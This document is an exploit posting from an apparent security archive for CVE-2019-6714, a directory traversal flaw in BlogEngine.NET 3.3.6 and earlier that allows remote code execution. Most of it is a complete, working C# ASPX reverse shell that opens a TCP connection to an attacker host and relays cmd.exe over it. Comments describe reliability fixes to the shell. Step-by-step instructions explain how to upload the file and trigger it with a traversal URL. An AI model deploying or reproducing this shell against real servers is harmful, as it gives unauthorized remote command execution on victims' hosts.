
BlogEngine.NET 3.3.6 Directory Traversal / Remote Code Execution

2019-02-12 00:00:00
Dustin Cobb
packetstormsecurity.com


`# Exploit Title: BlogEngine.NET <= 3.3.6 Directory Traversal RCE  
# Date: 02-11-2019  
# Exploit Author: Dustin Cobb  
# Vendor Homepage: https://github.com/rxtur/BlogEngine.NET/  
# Software Link: https://github.com/rxtur/BlogEngine.NET/releases/download/v3.3.6.0/3360.zip  
# Version: <= 3.3.6  
# Tested on: Windows 2016 Standard / IIS 10.0  
# CVE : CVE-2019-6714  
  
/*  
* CVE-2019-6714  
*  
* Path traversal vulnerability leading to remote code execution. This   
* vulnerability affects BlogEngine.NET versions 3.3.6 and below. It is  
* caused by an unchecked "theme" query-string parameter that overrides the  
* directory the blog loads its theme controls from; a traversal sequence in  
* that parameter therefore makes the blog load an attacker-uploaded .ascx  
* from /App_Data/files. The vulnerable code can be seen in this file:  
*   
* /Custom/Controls/PostList.ascx.cs  
*  
* Attack:  
*  
* First, we set the TcpClient address and port within the method below to   
* our attack host, which must already have a reverse TCP listener waiting   
* (e.g. nc -lvp 4445). If nothing is listening, the connect in OnLoad throws  
* and the page simply errors out.  
* Next, we upload this file through the file manager. This step is   
* post-authentication: it needs an account that is allowed to edit posts.   
* In the current (3.3.6) version of BlogEngine, this is done by editing a   
* post and clicking on the icon that looks like an open file in the toolbar.  
* Note that this file must be uploaded as PostView.ascx: that is the control  
* name the theme engine resolves inside the selected theme directory, so the  
* traversal below makes it pick up our copy. Once uploaded, the file will be  
* in the /App_Data/files directory off of the document root. The admin page  
* that allows upload is:  
*  
* http://10.10.10.10/admin/app/editor/editpost.cshtml  
*  
*  
* Finally, the vulnerability is triggered by accessing the base URL for the   
* blog with a theme override specified like so:  
*  
* http://10.10.10.10/?theme=../../App_Data/files  
*  
* Request it exactly once (curl is safer than a browser here): every request  
* that carries this override re-runs OnLoad below and spawns a fresh cmd.exe.  
* The shell runs with the identity of the IIS worker process (normally the   
* application pool account, not an administrator), and w3wp.exe spawning   
* cmd.exe is a high-signal event for any process-creation monitoring on the   
* host, so expect it to be noticed.  
*  
*/  
  
<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>  
<%@ Import Namespace="BlogEngine.Core" %>  
  
<script runat="server">  
// Writer back to the attacker's listener. It is static because the stdout
// callback (CmdOutputDataHandler) is raised asynchronously by
// Process.BeginOutputReadLine() and has no reference to this control instance.
// NOTE(review): being static it is also shared by every concurrent request that
// renders this control, so overlapping requests would overwrite each other's writer.
static System.IO.StreamWriter streamWriter;  
  
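// Opens a reverse TCP connection to the attacker's listener and bridges it to a
// cmd.exe child: listener lines -> cmd.exe stdin, cmd.exe stdout/stderr -> listener
// (via CmdOutputDataHandler). Runs on every render of this control, i.e. once per
// request that selects the traversed "theme" directory.
//
// Fixes over the original:
//  - the relay loop exits when the listener disconnects (ReadLine() returns null)
//    instead of spinning forever and writing empty lines into cmd.exe;
//  - stderr was redirected but never read, so a command with enough stderr
//    output could fill the pipe and wedge cmd.exe; it is now drained too;
//  - cmd.exe is killed and the Process/StreamWriter handles are disposed on exit,
//    so the request no longer leaves an orphaned shell behind.
protected override void OnLoad(EventArgs e) {
    base.OnLoad(e);

    // Attacker listener; edit before uploading. The listener must be up before
    // the page is requested, otherwise the connect throws and the page errors out.
    const string attackerHost = "10.10.10.20";
    const int attackerPort = 4445;

    using (System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient(attackerHost, attackerPort))
    using (System.IO.Stream stream = client.GetStream())
    using (System.IO.StreamReader rdr = new System.IO.StreamReader(stream))
    using (System.IO.StreamWriter wtr = new System.IO.StreamWriter(stream))
    using (System.Diagnostics.Process p = new System.Diagnostics.Process()) {
        // The output callback runs outside this method and needs the writer.
        // NOTE(review): the static is shared by all concurrent requests, so two
        // overlapping requests would steal each other's output.
        streamWriter = wtr;

        p.StartInfo.FileName = "cmd.exe";
        p.StartInfo.CreateNoWindow = true;
        p.StartInfo.UseShellExecute = false; // required for stream redirection
        p.StartInfo.RedirectStandardInput = true;
        p.StartInfo.RedirectStandardOutput = true;
        p.StartInfo.RedirectStandardError = true;
        p.OutputDataReceived += CmdOutputDataHandler;
        p.ErrorDataReceived += CmdOutputDataHandler;
        p.Start();
        p.BeginOutputReadLine();
        p.BeginErrorReadLine();

        // Relay one command per line until the listener closes its side (null).
        string line;
        while ((line = rdr.ReadLine()) != null) {
            if (p.HasExited) {
                break; // operator typed "exit" (or cmd.exe died); stop relaying
            }
            p.StandardInput.WriteLine(line);
        }

        // Don't leave an orphaned cmd.exe behind once the operator disconnects.
        try {
            if (!p.HasExited) {
                p.Kill();
            }
        } catch (InvalidOperationException) {
            // Process already exited between the HasExited check and Kill().
        } catch (System.ComponentModel.Win32Exception) {
            // Kill was refused (e.g. the process is already terminating).
        }
    }
}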
  
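// Relays one line of cmd.exe output back to the listener. Raised asynchronously
// by Process.BeginOutputReadLine()/BeginErrorReadLine(), i.e. not on the request
// thread — hence the static streamWriter rather than instance state.
// sendingProcess: the Process raising the event (unused).
// outLine.Data:   the output line, or null once that output stream closes.
private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
    // Null signals end-of-stream; empty lines are dropped as in the original.
    if (String.IsNullOrEmpty(outLine.Data)) {
        return;
    }

    // Snapshot the static before using it. NOTE(review): it is shared by every
    // concurrent request rendering this control, so it can be swapped or
    // disposed under us; a null means no request has set one up yet.
    System.IO.StreamWriter target = streamWriter;
    if (target == null) {
        return;
    }

    try {
        target.WriteLine(outLine.Data);
        target.Flush();
    } catch (Exception) {
        // Deliberate best-effort: the listener may have gone away, or the
        // request's using-blocks may already have closed the socket. This
        // callback runs on a worker thread where an unhandled exception would
        // most likely bring down the whole IIS worker process, so dropping a
        // line of output is the lesser evil.
    }
}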
  
</script>  
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>  
`
